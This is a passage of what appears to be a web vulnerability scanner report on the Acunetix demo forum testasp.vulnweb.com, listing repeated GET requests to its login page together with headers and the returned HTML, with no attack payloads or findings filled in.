style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=27 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=28 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=29 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:03 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=3 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=30 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=31 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=32 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:04 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
